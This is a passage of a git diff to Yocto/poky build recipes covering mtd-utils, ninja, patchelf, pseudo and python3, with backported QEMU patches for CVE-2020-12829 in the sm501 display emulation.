*mtd, - - out_free: - free(hdr); -- return -1; -+ return ret; - } - - int main(int argc, char * const argv[]) --- -2.27.0 - diff --git a/poky/meta/recipes-devtools/mtd/mtd-utils_git.bb b/poky/meta/recipes-devtools/mtd/mtd-utils_git.bb index 9c05dc03dc..fa42770ee4 100644 --- a/poky/meta/recipes-devtools/mtd/mtd-utils_git.bb +++ b/poky/meta/recipes-devtools/mtd/mtd-utils_git.bb @@ -11,18 +11,15 @@ inherit autotools pkgconfig update-alternatives DEPENDS = "zlib e2fsprogs util-linux" RDEPENDS_mtd-utils-tests += "bash" -PV = "2.1.1" +PV = "2.1.3" -SRCREV = "4443221ce9b88440cd9f5bb78e6fe95621d36c8a" -SRC_URI = "git://git.infradead.org/mtd-utils.git \ +SRCREV = "42ea7cd48d2b3c306d59bb6c530d79f8c25bf9f5" +SRC_URI = "git://git.infradead.org/mtd-utils.git;branch=master \ file://add-exclusion-to-mkfs-jffs2-git-2.patch \ - file://0001-mtd-utils-Fix-return-value-of-ubiformat.patch \ -" + " S = "${WORKDIR}/git/" -EXTRA_OECONF += "--enable-install-tests" - # xattr support creates an additional compile-time dependency on acl because # the sys/acl.h header is needed. libacl is not needed and thus enabling xattr # regardless whether acl is enabled or disabled in the distro should be okay. diff --git a/poky/meta/recipes-devtools/ninja/ninja_1.10.0.bb b/poky/meta/recipes-devtools/ninja/ninja_1.10.0.bb index c02b876c02..ae3f3f1ea8 100644 --- a/poky/meta/recipes-devtools/ninja/ninja_1.10.0.bb +++ b/poky/meta/recipes-devtools/ninja/ninja_1.10.0.bb @@ -8,7 +8,7 @@ DEPENDS = "re2c-native ninja-native" SRCREV = "ed7f67040b370189d989adbd60ff8ea29957231f" -SRC_URI = "git://github.com/ninja-build/ninja.git;branch=release" +SRC_URI = "git://github.com/ninja-build/ninja.git;branch=release;protocol=https" UPSTREAM_CHECK_GITTAGREGEX = "v(?P.*)" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-devtools/patchelf/patchelf_0.10.bb b/poky/meta/recipes-devtools/patchelf/patchelf_0.10.bb index b64eaf3c21..2bf3108f88 100644 --- a/poky/meta/recipes-devtools/patchelf/patchelf_0.10.bb +++ b/poky/meta/recipes-devtools/patchelf/patchelf_0.10.bb @@ -4,7 +4,7 @@ HOMEPAGE = "https://github.com/NixOS/patchelf" LICENSE = "GPLv3" -SRC_URI = "git://github.com/NixOS/patchelf;protocol=https \ +SRC_URI = "git://github.com/NixOS/patchelf;protocol=https;branch=master \ file://handle-read-only-files.patch \ file://fix-adjusting-startPage.patch \ file://fix-phdrs.patch \ diff --git a/poky/meta/recipes-devtools/pseudo/files/build-oldlibc b/poky/meta/recipes-devtools/pseudo/files/build-oldlibc new file mode 100755 index 0000000000..85c438de4e --- /dev/null +++ b/poky/meta/recipes-devtools/pseudo/files/build-oldlibc @@ -0,0 +1,20 @@ +#!/bin/sh +# +# Script to re-generate pseudo-prebuilt-2.33.tar.xz +# +# Copyright (C) 2021 Richard Purdie +# +# SPDX-License-Identifier: GPL-2.0-only +# + +for i in x86_64 aarch64 i686; do + if [ ! -e $i-nativesdk-libc.tar.xz ]; then + wget http://downloads.yoctoproject.org/releases/uninative/3.2/$i-nativesdk-libc.tar.xz + fi + tar -xf $i-nativesdk-libc.tar.xz --wildcards \*/lib/libpthread\* \*/lib/libdl\* + cd $i-linux/lib + ln -s libdl.so.2 libdl.so + ln -s libpthread.so.0 libpthread.so + cd ../.. +done +tar -cJf pseudo-prebuilt-2.33.tar.xz *-linux \ No newline at end of file diff --git a/poky/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch b/poky/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch new file mode 100644 index 0000000000..c453b5f735 --- /dev/null +++ b/poky/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch @@ -0,0 +1,57 @@ +If we link against a newer glibc 2.34 and then try and our LD_PRELOAD is run against a +binary on a host with an older libc, we see symbol errors since in glibc 2.34, pthread +and dl are merged into libc itself. + +We need to use the older form of linking so use glibc binaries from an older release +to force this. We only use minimal symbols from these anyway. + +pthread_atfork is problematic, particularly on arm so use the internal glibc routine +it maps too. This was always present in the main libc from 2.3.2 onwards. + +Yes this is horrible. Better solutions welcome. + +There is more info in the bug: [YOCTO #14521] + +Upstream-Status: Inappropriate [this patch is native and nativesdk] +Signed-off-by: Richard Purdie + +Tweak library search order, make prebuilt lib ahead of recipe lib +Signed-off-by: Hongxu Jia +--- + Makefile.in | 2 +- + pseudo_wrappers.c | 5 ++++- + 2 files changed, 5 insertions(+), 2 deletions(-) + +diff --git a/Makefile.in b/Makefile.in +--- a/Makefile.in ++++ b/Makefile.in +@@ -120,7 +120,7 @@ $(PSEUDODB): pseudodb.o $(SHOBJS) $(DBOBJS) pseudo_ipc.o | $(BIN) + libpseudo: $(LIBPSEUDO) + + $(LIBPSEUDO): $(WRAPOBJS) pseudo_client.o pseudo_ipc.o $(SHOBJS) | $(LIB) +- $(CC) $(CFLAGS) $(CFLAGS_PSEUDO) -shared -o $(LIBPSEUDO) \ ++ $(CC) $(CFLAGS) -Lprebuilt/$(shell uname -m)-linux/lib/ $(CFLAGS_PSEUDO) -shared -o $(LIBPSEUDO) \ + pseudo_client.o pseudo_ipc.o \ + $(WRAPOBJS) $(SHOBJS) $(LDFLAGS) $(CLIENT_LDFLAGS) + +diff --git a/pseudo_wrappers.c b/pseudo_wrappers.c +--- a/pseudo_wrappers.c ++++ b/pseudo_wrappers.c +@@ -100,10 +100,13 @@ static void libpseudo_atfork_child(void) + pseudo_mutex_holder = 0; + } + ++extern void *__dso_handle; ++extern int __register_atfork (void (*) (void), void (*) (void), void (*) (void), void *); ++ + static void + _libpseudo_init(void) { + if (!_libpseudo_initted) +- pthread_atfork(NULL, NULL, libpseudo_atfork_child); ++ __register_atfork (NULL, NULL, libpseudo_atfork_child, &__dso_handle == NULL ? NULL : __dso_handle); + + pseudo_getlock(); + pseudo_antimagic(); +-- +2.27.0 + diff --git a/poky/meta/recipes-devtools/pseudo/pseudo_git.bb b/poky/meta/recipes-devtools/pseudo/pseudo_git.bb index 0ba460f3e6..1a5d230c69 100644 --- a/poky/meta/recipes-devtools/pseudo/pseudo_git.bb +++ b/poky/meta/recipes-devtools/pseudo/pseudo_git.bb @@ -5,8 +5,15 @@ SRC_URI = "git://git.yoctoproject.org/pseudo;branch=oe-core \ file://fallback-passwd \ file://fallback-group \ " +SRC_URI:append:class-native = " \ + http://downloads.yoctoproject.org/mirror/sources/pseudo-prebuilt-2.33.tar.xz;subdir=git/prebuilt;name=prebuilt \ + file://older-glibc-symbols.patch" +SRC_URI:append:class-nativesdk = " \ + http://downloads.yoctoproject.org/mirror/sources/pseudo-prebuilt-2.33.tar.xz;subdir=git/prebuilt;name=prebuilt \ + file://older-glibc-symbols.patch" +SRC_URI[prebuilt.sha256sum] = "ed9f456856e9d86359f169f46a70ad7be4190d6040282b84c8d97b99072485aa" -SRCREV = "b988b0a6b8afd8d459bc9a2528e834f63a3d59b2" +SRCREV = "d34f2f6cedccf8488730001bcbde6bb7499f8814" S = "${WORKDIR}/git" PV = "1.9.0+git${SRCPV}" diff --git a/poky/meta/recipes-devtools/python/python3-magic_0.4.15.bb b/poky/meta/recipes-devtools/python/python3-magic_0.4.15.bb index 698016ba4c..b73310c808 100644 --- a/poky/meta/recipes-devtools/python/python3-magic_0.4.15.bb +++ b/poky/meta/recipes-devtools/python/python3-magic_0.4.15.bb @@ -14,6 +14,11 @@ inherit pypi setuptools3 SRC_URI[md5sum] = "e384c95a47218f66c6501cd6dd45ff59" SRC_URI[sha256sum] = "f3765c0f582d2dfc72c15f3b5a82aecfae9498bd29ca840d72f37d7bd38bfcd5" -RDEPENDS_${PN} += "file" +DEPENDS_append_class-native = " file-replacement-native" + +RDEPENDS_${PN} += "file \ + ${PYTHON_PN}-ctypes \ + ${PYTHON_PN}-io \ + ${PYTHON_PN}-shell" BBCLASSEXTEND = "native" diff --git a/poky/meta/recipes-devtools/python/python3/makerace.patch b/poky/meta/recipes-devtools/python/python3/makerace.patch new file mode 100644 index 0000000000..8971f28b8e --- /dev/null +++ b/poky/meta/recipes-devtools/python/python3/makerace.patch @@ -0,0 +1,23 @@ +libainstall installs python-config.py but the .pyc cache files are generated +by the libinstall target. This means some builds may not generate the pyc files +for python-config.py depending on the order things happen in. This means builds +are not always reproducible. + +Add a dependency to avoid the race. + +Upstream-Status: Pending +Signed-off-by: Richard Purdie + +Index: Python-3.8.11/Makefile.pre.in +=================================================================== +--- Python-3.8.11.orig/Makefile.pre.in ++++ Python-3.8.11/Makefile.pre.in +@@ -1415,7 +1415,7 @@ LIBSUBDIRS= tkinter tkinter/test tkinter + unittest unittest/test unittest/test/testmock \ + venv venv/scripts venv/scripts/common venv/scripts/posix \ + curses pydoc_data +-libinstall: build_all $(srcdir)/Modules/xxmodule.c ++libinstall: build_all $(srcdir)/Modules/xxmodule.c libainstall + @for i in $(SCRIPTDIR) $(LIBDEST); \ + do \ + if test ! -d $(DESTDIR)$$i; then \ diff --git a/poky/meta/recipes-devtools/python/python3_3.8.11.bb b/poky/meta/recipes-devtools/python/python3_3.8.11.bb deleted file mode 100644 index f549bb2205..0000000000 --- a/poky/meta/recipes-devtools/python/python3_3.8.11.bb +++ /dev/null @@ -1,362 +0,0 @@ -SUMMARY = "The Python Programming Language" -HOMEPAGE = "http://www.python.org" -DESCRIPTION = "Python is a programming language that lets you work more quickly and integrate your systems more effectively." -LICENSE = "PSF-2.0 & BSD-0-Clause" -SECTION = "devel/python" - -LIC_FILES_CHKSUM = "file://LICENSE;md5=c22d2438294c784731bf9dd224a467b7" - -SRC_URI = "http://www.python.org/ftp/python/${PV}/Python-${PV}.tar.xz \ - file://run-ptest \ - file://create_manifest3.py \ - file://get_module_deps3.py \ - file://python3-manifest.json \ - file://check_build_completeness.py \ - file://cgi_py.patch \ - file://0001-Do-not-add-usr-lib-termcap-to-linker-flags-to-avoid-.patch \ - ${@bb.utils.contains('PACKAGECONFIG', 'tk', '', 'file://avoid_warning_about_tkinter.patch', d)} \ - file://0001-Do-not-use-the-shell-version-of-python-config-that-w.patch \ - file://python-config.patch \ - file://0001-Makefile.pre-use-qemu-wrapper-when-gathering-profile.patch \ - file://0001-Do-not-hardcode-lib-as-location-for-site-packages-an.patch \ - file://0001-python3-use-cc_basename-to-replace-CC-for-checking-c.patch \ - file://0001-Lib-sysconfig.py-fix-another-place-where-lib-is-hard.patch \ - file://0001-Makefile-fix-Issue36464-parallel-build-race-problem.patch \ - file://0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch \ - file://crosspythonpath.patch \ - file://reformat_sysconfig.py \ - file://0001-Use-FLAG_REF-always-for-interned-strings.patch \ - file://0001-test_locale.py-correct-the-test-output-format.patch \ - file://0017-setup.py-do-not-report-missing-dependencies-for-disa.patch \ - file://0001-setup.py-pass-missing-libraries-to-Extension-for-mul.patch \ - file://0001-Makefile-do-not-compile-.pyc-in-parallel.patch \ - file://0001-configure.ac-fix-LIBPL.patch \ - file://0001-python3-Do-not-hardcode-lib-for-distutils.patch \ - file://0020-configure.ac-setup.py-do-not-add-a-curses-include-pa.patch \ - " - -SRC_URI_append_class-native = " \ - file://0001-distutils-sysconfig-append-STAGING_LIBDIR-python-sys.patch \ - file://12-distutils-prefix-is-inside-staging-area.patch \ - file://0001-Don-t-search-system-for-headers-libraries.patch \ - " - -SRC_URI[md5sum] = "5840ba601128f48fee4e7c98fbdac65d" -SRC_URI[sha256sum] = "fb1a1114ebfe9e97199603c6083e20b236a0e007a2c51f29283ffb50c1420fb2" - -# exclude pre-releases for both python 2.x and 3.x -UPSTREAM_CHECK_REGEX = "[Pp]ython-(?P\d+(\.\d+)+).tar" - -CVE_PRODUCT = "python" - -# Upstream consider this expected behaviour -CVE_CHECK_WHITELIST += "CVE-2007-4559" -# This is not exploitable when glibc has CVE-2016-10739 fixed. -CVE_CHECK_WHITELIST += "CVE-2019-18348" - -# This is windows only issue. -CVE_CHECK_WHITELIST += "CVE-2020-15523" - -PYTHON_MAJMIN = "3.8" - -S = "${WORKDIR}/Python-${PV}" - -BBCLASSEXTEND = "native nativesdk" - -inherit autotools pkgconfig qemu ptest multilib_header update-alternatives - -MULTILIB_SUFFIX = "${@d.getVar('base_libdir',1).split('/')[-1]}" - -ALTERNATIVE_${PN}-dev = "python3-config" -ALTERNATIVE_LINK_NAME[python3-config] = "${bindir}/python${PYTHON_MAJMIN}-config" -ALTERNATIVE_TARGET[python3-config] = "${bindir}/python${PYTHON_MAJMIN}-config-${MULTILIB_SUFFIX}" - - -DEPENDS = "bzip2-replacement-native libffi bzip2 openssl sqlite3 zlib virtual/libintl xz virtual/crypt util-linux libtirpc libnsl2 autoconf-archive" -DEPENDS_append_class-target = " python3-native" -DEPENDS_append_class-nativesdk = " python3-native" - -EXTRA_OECONF = " --without-ensurepip --enable-shared" -EXTRA_OECONF_append_class-native = " --bindir=${bindir}/${PN}" - -export CROSSPYTHONPATH="${STAGING_LIBDIR_NATIVE}/python${PYTHON_MAJMIN}/lib-dynload/" - -EXTRANATIVEPATH += "python3-native" - -CACHED_CONFIGUREVARS = " \ - ac_cv_file__dev_ptmx=yes \ - ac_cv_file__dev_ptc=no \ - ac_cv_working_tzset=yes \ -" -python() { - # PGO currently causes builds to not be reproducible, so disable it for - # now. See YOCTO #13407 - if bb.utils.contains('MACHINE_FEATURES', 'qemu-usermode', True, False, d) and d.getVar('BUILD_REPRODUCIBLE_BINARIES') != '1': - d.setVar('PACKAGECONFIG_PGO', 'pgo') - else: - d.setVar('PACKAGECONFIG_PGO', '') -} - -PACKAGECONFIG_class-target ??= "readline ${PACKAGECONFIG_PGO} gdbm" -PACKAGECONFIG_class-native ??= "readline gdbm" -PACKAGECONFIG_class-nativesdk ??= "readline gdbm" -PACKAGECONFIG[readline] = ",,readline" -# Use profile guided optimisation by running PyBench inside qemu-user -PACKAGECONFIG[pgo] = "--enable-optimizations,,qemu-native" -PACKAGECONFIG[tk] = ",,tk" -PACKAGECONFIG[gdbm] = ",,gdbm" - -do_configure_prepend () { - mkdir -p ${B}/Modules - cat > ${B}/Modules/Setup.local << EOF -*disabled* -${@bb.utils.contains('PACKAGECONFIG', 'gdbm', '', '_gdbm _dbm', d)} -${@bb.utils.contains('PACKAGECONFIG', 'readline', '', 'readline', d)} -EOF -} - -CPPFLAGS_append = " -I${STAGING_INCDIR}/ncursesw -I${STAGING_INCDIR}/uuid" - -EXTRA_OEMAKE = '\ - STAGING_LIBDIR=${STAGING_LIBDIR} \ - STAGING_INCDIR=${STAGING_INCDIR} \ - LIB=${baselib} \ -' - -do_compile_prepend_class-target() { - if ${@bb.utils.contains('PACKAGECONFIG', 'pgo', 'true', 'false', d)}; then - qemu_binary="${@qemu_wrapper_cmdline(d, '${STAGING_DIR_TARGET}', ['${B}', '${STAGING_DIR_TARGET}/${base_libdir}'])}" - cat >pgo-wrapper < ${B}/Modules/Setup.local << EOF +*disabled* +${@bb.utils.contains('PACKAGECONFIG', 'gdbm', '', '_gdbm _dbm', d)} +${@bb.utils.contains('PACKAGECONFIG', 'readline', '', 'readline', d)} +EOF +} + +CPPFLAGS_append = " -I${STAGING_INCDIR}/ncursesw -I${STAGING_INCDIR}/uuid" + +EXTRA_OEMAKE = '\ + STAGING_LIBDIR=${STAGING_LIBDIR} \ + STAGING_INCDIR=${STAGING_INCDIR} \ + LIB=${baselib} \ +' + +do_compile_prepend_class-target() { + if ${@bb.utils.contains('PACKAGECONFIG', 'pgo', 'true', 'false', d)}; then + qemu_binary="${@qemu_wrapper_cmdline(d, '${STAGING_DIR_TARGET}', ['${B}', '${STAGING_DIR_TARGET}/${base_libdir}'])}" + cat >pgo-wrapper < +Date: Thu, 21 May 2020 21:39:44 +0200 +Subject: [PATCH] sm501: Convert printf + abort to qemu_log_mask +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Some places already use qemu_log_mask() to log unimplemented features +or errors but some others have printf() then abort(). Convert these to +qemu_log_mask() and avoid aborting to prevent guests to easily cause +denial of service. + +Signed-off-by: BALATON Zoltan +Reviewed-by: Philippe Mathieu-Daudé +Message-id: 305af87f59d81e92f2aaff09eb8a3603b8baa322.1590089984.git.balaton@eik.bme.hu +Signed-off-by: Gerd Hoffmann + +Upstream-Status: Backport +CVE: CVE-2020-12829 dep#1 +Signed-off-by: Armin Kuster + +--- + hw/display/sm501.c | 57 ++++++++++++++++++++++------------------------ + 1 file changed, 27 insertions(+), 30 deletions(-) + +diff --git a/hw/display/sm501.c b/hw/display/sm501.c +index acc692531a..bd3ccfe311 100644 +--- a/hw/display/sm501.c ++++ b/hw/display/sm501.c +@@ -727,8 +727,8 @@ static void sm501_2d_operation(SM501State *s) + int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt); + + if (addressing != 0x0) { +- printf("%s: only XY addressing is supported.\n", __func__); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: only XY addressing is supported.\n"); ++ return; + } + + if (rop_mode == 0) { +@@ -754,8 +754,8 @@ static void sm501_2d_operation(SM501State *s) + + if ((s->twoD_source_base & 0x08000000) || + (s->twoD_destination_base & 0x08000000)) { +- printf("%s: only local memory is supported.\n", __func__); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n"); ++ return; + } + + switch (operation) { +@@ -823,9 +823,9 @@ static void sm501_2d_operation(SM501State *s) + break; + + default: +- printf("non-implemented SM501 2D operation. %d\n", operation); +- abort(); +- break; ++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n", ++ operation); ++ return; + } + + if (dst_base >= get_fb_addr(s, crt) && +@@ -892,9 +892,8 @@ static uint64_t sm501_system_config_read(void *opaque, hwaddr addr, + break; + + default: +- printf("sm501 system config : not implemented register read." +- " addr=%x\n", (int)addr); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented system config" ++ "register read. addr=%" HWADDR_PRIx "\n", addr); + } + + return ret; +@@ -948,15 +947,15 @@ static void sm501_system_config_write(void *opaque, hwaddr addr, + break; + case SM501_ENDIAN_CONTROL: + if (value & 0x00000001) { +- printf("sm501 system config : big endian mode not implemented.\n"); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: system config big endian mode not" ++ " implemented.\n"); + } + break; + + default: +- printf("sm501 system config : not implemented register write." +- " addr=%x, val=%x\n", (int)addr, (uint32_t)value); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented system config" ++ "register write. addr=%" HWADDR_PRIx ++ ", val=%" PRIx64 "\n", addr, value); + } + } + +@@ -1207,9 +1206,8 @@ static uint64_t sm501_disp_ctrl_read(void *opaque, hwaddr addr, + break; + + default: +- printf("sm501 disp ctrl : not implemented register read." +- " addr=%x\n", (int)addr); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register " ++ "read. addr=%" HWADDR_PRIx "\n", addr); + } + + return ret; +@@ -1345,9 +1343,9 @@ static void sm501_disp_ctrl_write(void *opaque, hwaddr addr, + break; + + default: +- printf("sm501 disp ctrl : not implemented register write." +- " addr=%x, val=%x\n", (int)addr, (unsigned)value); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register " ++ "write. addr=%" HWADDR_PRIx ++ ", val=%" PRIx64 "\n", addr, value); + } + } + +@@ -1433,9 +1431,8 @@ static uint64_t sm501_2d_engine_read(void *opaque, hwaddr addr, + ret = 0; /* Should return interrupt status */ + break; + default: +- printf("sm501 disp ctrl : not implemented register read." +- " addr=%x\n", (int)addr); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register " ++ "read. addr=%" HWADDR_PRIx "\n", addr); + } + + return ret; +@@ -1520,9 +1517,9 @@ static void sm501_2d_engine_write(void *opaque, hwaddr addr, + /* ignored, writing 0 should clear interrupt status */ + break; + default: +- printf("sm501 2d engine : not implemented register write." +- " addr=%x, val=%x\n", (int)addr, (unsigned)value); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2d engine register " ++ "write. addr=%" HWADDR_PRIx ++ ", val=%" PRIx64 "\n", addr, value); + } + } + +@@ -1670,9 +1667,9 @@ static void sm501_update_display(void *opaque) + draw_line = draw_line32_funcs[dst_depth_index]; + break; + default: +- printf("sm501 update display : invalid control register value.\n"); +- abort(); +- break; ++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: update display" ++ "invalid control register value.\n"); ++ return; + } + + /* set up to draw hardware cursor */ +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch new file mode 100644 index 0000000000..e7258a43d3 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch @@ -0,0 +1,139 @@ +From 6f8183b5dc5b309378687830a25e85ea8fb860ea Mon Sep 17 00:00:00 2001 +From: BALATON Zoltan +Date: Thu, 21 May 2020 21:39:44 +0200 +Subject: [PATCH 2/5] sm501: Shorten long variable names in sm501_2d_operation + +This increases readability and cleans up some confusing naming. + +Signed-off-by: BALATON Zoltan +Message-id: b9b67b94c46e945252a73c77dfd117132c63c4fb.1590089984.git.balaton@eik.bme.hu +Signed-off-by: Gerd Hoffmann + +Upstream-Status: Backport +CVE: CVE-2020-12829 dep#2 +Signed-off-by: Armin Kuster + +--- + hw/display/sm501.c | 45 ++++++++++++++++++++++----------------------- + 1 file changed, 22 insertions(+), 23 deletions(-) + +diff --git a/hw/display/sm501.c b/hw/display/sm501.c +index bd3ccfe311..f42d05e1e4 100644 +--- a/hw/display/sm501.c ++++ b/hw/display/sm501.c +@@ -700,17 +700,16 @@ static inline void hwc_invalidate(SM501State *s, int crt) + static void sm501_2d_operation(SM501State *s) + { + /* obtain operation parameters */ +- int operation = (s->twoD_control >> 16) & 0x1f; ++ int cmd = (s->twoD_control >> 16) & 0x1F; + int rtl = s->twoD_control & 0x8000000; + int src_x = (s->twoD_source >> 16) & 0x01FFF; + int src_y = s->twoD_source & 0xFFFF; + int dst_x = (s->twoD_destination >> 16) & 0x01FFF; + int dst_y = s->twoD_destination & 0xFFFF; +- int operation_width = (s->twoD_dimension >> 16) & 0x1FFF; +- int operation_height = s->twoD_dimension & 0xFFFF; ++ int width = (s->twoD_dimension >> 16) & 0x1FFF; ++ int height = s->twoD_dimension & 0xFFFF; + uint32_t color = s->twoD_foreground; +- int format_flags = (s->twoD_stretch >> 20) & 0x3; +- int addressing = (s->twoD_stretch >> 16) & 0xF; ++ int format = (s->twoD_stretch >> 20) & 0x3; + int rop_mode = (s->twoD_control >> 15) & 0x1; /* 1 for rop2, else rop3 */ + /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */ + int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1; +@@ -721,12 +720,12 @@ static void sm501_2d_operation(SM501State *s) + /* get frame buffer info */ + uint8_t *src = s->local_mem + src_base; + uint8_t *dst = s->local_mem + dst_base; +- int src_width = s->twoD_pitch & 0x1FFF; +- int dst_width = (s->twoD_pitch >> 16) & 0x1FFF; ++ int src_pitch = s->twoD_pitch & 0x1FFF; ++ int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF; + int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0; + int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt); + +- if (addressing != 0x0) { ++ if ((s->twoD_stretch >> 16) & 0xF) { + qemu_log_mask(LOG_UNIMP, "sm501: only XY addressing is supported.\n"); + return; + } +@@ -758,20 +757,20 @@ static void sm501_2d_operation(SM501State *s) + return; + } + +- switch (operation) { ++ switch (cmd) { + case 0x00: /* copy area */ + #define COPY_AREA(_bpp, _pixel_type, rtl) { \ + int y, x, index_d, index_s; \ +- for (y = 0; y < operation_height; y++) { \ +- for (x = 0; x < operation_width; x++) { \ ++ for (y = 0; y < height; y++) { \ ++ for (x = 0; x < width; x++) { \ + _pixel_type val; \ + \ + if (rtl) { \ +- index_s = ((src_y - y) * src_width + src_x - x) * _bpp; \ +- index_d = ((dst_y - y) * dst_width + dst_x - x) * _bpp; \ ++ index_s = ((src_y - y) * src_pitch + src_x - x) * _bpp; \ ++ index_d = ((dst_y - y) * dst_pitch + dst_x - x) * _bpp; \ + } else { \ +- index_s = ((src_y + y) * src_width + src_x + x) * _bpp; \ +- index_d = ((dst_y + y) * dst_width + dst_x + x) * _bpp; \ ++ index_s = ((src_y + y) * src_pitch + src_x + x) * _bpp; \ ++ index_d = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \ + } \ + if (rop_mode == 1 && rop == 5) { \ + /* Invert dest */ \ +@@ -783,7 +782,7 @@ static void sm501_2d_operation(SM501State *s) + } \ + } \ + } +- switch (format_flags) { ++ switch (format) { + case 0: + COPY_AREA(1, uint8_t, rtl); + break; +@@ -799,15 +798,15 @@ static void sm501_2d_operation(SM501State *s) + case 0x01: /* fill rectangle */ + #define FILL_RECT(_bpp, _pixel_type) { \ + int y, x; \ +- for (y = 0; y < operation_height; y++) { \ +- for (x = 0; x < operation_width; x++) { \ +- int index = ((dst_y + y) * dst_width + dst_x + x) * _bpp; \ ++ for (y = 0; y < height; y++) { \ ++ for (x = 0; x < width; x++) { \ ++ int index = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \ + *(_pixel_type *)&dst[index] = (_pixel_type)color; \ + } \ + } \ + } + +- switch (format_flags) { ++ switch (format) { + case 0: + FILL_RECT(1, uint8_t); + break; +@@ -824,14 +823,14 @@ static void sm501_2d_operation(SM501State *s) + + default: + qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n", +- operation); ++ cmd); + return; + } + + if (dst_base >= get_fb_addr(s, crt) && + dst_base <= get_fb_addr(s, crt) + fb_len) { +- int dst_len = MIN(fb_len, ((dst_y + operation_height - 1) * dst_width + +- dst_x + operation_width) * (1 << format_flags)); ++ int dst_len = MIN(fb_len, ((dst_y + height - 1) * dst_pitch + ++ dst_x + width) * (1 << format)); + if (dst_len) { + memory_region_set_dirty(&s->local_mem_region, dst_base, dst_len); + } +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch new file mode 100644 index 0000000000..c647028cfe --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch @@ -0,0 +1,47 @@ +From 2824809b7f8f03ddc6e2b7e33e78c06022424298 Mon Sep 17 00:00:00 2001 +From: BALATON Zoltan +Date: Thu, 21 May 2020 21:39:44 +0200 +Subject: [PATCH 3/5] sm501: Use BIT(x) macro to shorten constant +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Signed-off-by: BALATON Zoltan +Reviewed-by: Philippe Mathieu-Daudé +Message-id: 124bf5de8d7cf503b32b377d0445029a76bfbd49.1590089984.git.balaton@eik.bme.hu +Signed-off-by: Gerd Hoffmann + +Upstream-Status: Backport +CVE: CVE-2020-12829 dep#3 +Signed-off-by: Armin Kuster + +--- + hw/display/sm501.c | 5 ++--- + 1 file changed, 2 insertions(+), 3 deletions(-) + +diff --git a/hw/display/sm501.c b/hw/display/sm501.c +index f42d05e1e4..97660090bb 100644 +--- a/hw/display/sm501.c ++++ b/hw/display/sm501.c +@@ -701,7 +701,7 @@ static void sm501_2d_operation(SM501State *s) + { + /* obtain operation parameters */ + int cmd = (s->twoD_control >> 16) & 0x1F; +- int rtl = s->twoD_control & 0x8000000; ++ int rtl = s->twoD_control & BIT(27); + int src_x = (s->twoD_source >> 16) & 0x01FFF; + int src_y = s->twoD_source & 0xFFFF; + int dst_x = (s->twoD_destination >> 16) & 0x01FFF; +@@ -751,8 +751,7 @@ static void sm501_2d_operation(SM501State *s) + } + } + +- if ((s->twoD_source_base & 0x08000000) || +- (s->twoD_destination_base & 0x08000000)) { ++ if (s->twoD_source_base & BIT(27) || s->twoD_destination_base & BIT(27)) { + qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n"); + return; + } +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch new file mode 100644 index 0000000000..485af05e1e --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch @@ -0,0 +1,100 @@ +From 3d0b096298b5579a7fa0753ad90968b27bc65372 Mon Sep 17 00:00:00 2001 +From: BALATON Zoltan +Date: Thu, 21 May 2020 21:39:44 +0200 +Subject: [PATCH 4/5] sm501: Clean up local variables in sm501_2d_operation +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Make variables local to the block they are used in to make it clearer +which operation they are needed for. + +Signed-off-by: BALATON Zoltan +Reviewed-by: Philippe Mathieu-Daudé +Message-id: ae59f8138afe7f6a5a4a82539d0f61496a906b06.1590089984.git.balaton@eik.bme.hu +Signed-off-by: Gerd Hoffmann + +Upstream-Status: Backport +CVE: CVE-2020-12829 dep#4 +Signed-off-by: Armin Kuster + +--- + hw/display/sm501.c | 31 ++++++++++++++++--------------- + 1 file changed, 16 insertions(+), 15 deletions(-) + +diff --git a/hw/display/sm501.c b/hw/display/sm501.c +index 97660090bb..5ed57703d8 100644 +--- a/hw/display/sm501.c ++++ b/hw/display/sm501.c +@@ -699,28 +699,19 @@ static inline void hwc_invalidate(SM501State *s, int crt) + + static void 